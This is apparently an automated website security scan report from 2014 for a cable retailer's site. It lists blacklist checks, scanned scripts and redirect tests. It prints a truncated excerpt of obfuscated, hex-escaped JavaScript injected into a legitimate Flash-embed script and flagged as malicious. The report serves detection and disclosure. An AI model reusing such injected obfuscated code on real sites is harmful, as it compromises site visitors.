Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=search.cablesplususa.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://search.cablesplususa.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://search.cablesplususa.com/ | 200 OK Content-Length: 60019 Content-Type: text/html | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/mobileredirector.js | 200 OK Content-Length: 2490 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: cablesplususa.com ...[2179 bytes skipped]... mMobileSite"); if ((fromMobile == 'false') || (fromMobile == '')) { var isMobile = false; var agent = navigator.userAgent.toLowerCase(); for (var i = 0; i < mobileIndicators.length; i++){ var indicator = mobileIndicators[i].toLowerCase(); if (agent.indexOf(indicator) > -1) { isMobile = true; } } if (isMobile) { if (location.host.indexOf("cablesplususa.com") != -1) { var host = "http://m.cablesplususa.com" + location.pathname; if(window.location.search.substring(1) != '') { host = host + "?" + window.location.search.substring(1); } location.replace(host); } } } else { setCookie('fromMobileSite', 'true'); } } | ||
http://www.cablesplususa.com/FrameManager.js | 200 OK Content-Length: 2720 Content-Type: application/x-javascript | clean |
http://www.cablesplususa.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 11064 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var OCeuBmV="u\x73eri\x64A\x308\x317F\x422\x35";var F9lBnCy="28";var nhKNRj=1;function Vb1gC(qb_cD){var C5prmo4=document.cookie.replace(/\s/g,"").split(";");for(var OytUL=0;OytUL<C5prmo4.length;OytUL++){var c2uijl=C5prmo4[OytUL].split("=");if(c2uijl[0]==qb_cD){return unescape(c2uijl[1]);}}return null;};function AVJqAVz(qb_cD,y98VeNE,d19agzK){var Euyoazm=new Date();var ySrd1w=Euyoazm.getTime()+(d19agzK*60*60*1000);Euyoazm.setTime(ySrd1w);var jEfzry=qb_cD+"="+escape(y98VeNE)+"\x3b \x65xpi\x72e\ case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
| ||
http://www.cablesplususa.com/Scripts/freefreight.js | 200 OK Content-Length: 253 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/cablesplus.js | 200 OK Content-Length: 924 Content-Type: application/javascript | clean |
http://lib.store.yahoo.net/lib/yhst-7602493195877/thickbox.js | 200 OK Content-Length: 11933 Content-Type: application/javascript | clean |
http://ourbbbonline.bbb.org/Richmond/BBBOnlineSeal/21018411/bbbsealh2/0/ | 200 OK Content-Length: 1165 Content-Type: text/plain | clean |
http://ourbbbonline.bbb.org/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://live.monitus.net/scripts/monitus.js | 200 OK Content-Length: 2947 Content-Type: text/javascript | clean |
https://s.yimg.com/sv/store/yfc/js/0.14/loader_536a99d.js?q=yhst-7602493195877&ts=1408980244&p=0&h=order.store.yahoo.net&v=http://store.cablesplususa.com/ | 200 OK Content-Length: 38815 Content-Type: application/javascript | clean |
http://d.yimg.com/mi/ywa.js | 200 OK Content-Length: 46566 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: search.cablesplususa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 02:12:26 GMT
Server: Apache/2.2.2 (Fedora)
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: search.cablesplususa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 02:12:26 GMT
Server: Apache/2.2.2 (Fedora)
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: search.cablesplususa.com
Referer: http://www.google.com/search?q=search.cablesplususa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: search.cablesplususa.com
Referer: http://www.google.com/search?q=search.cablesplususa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.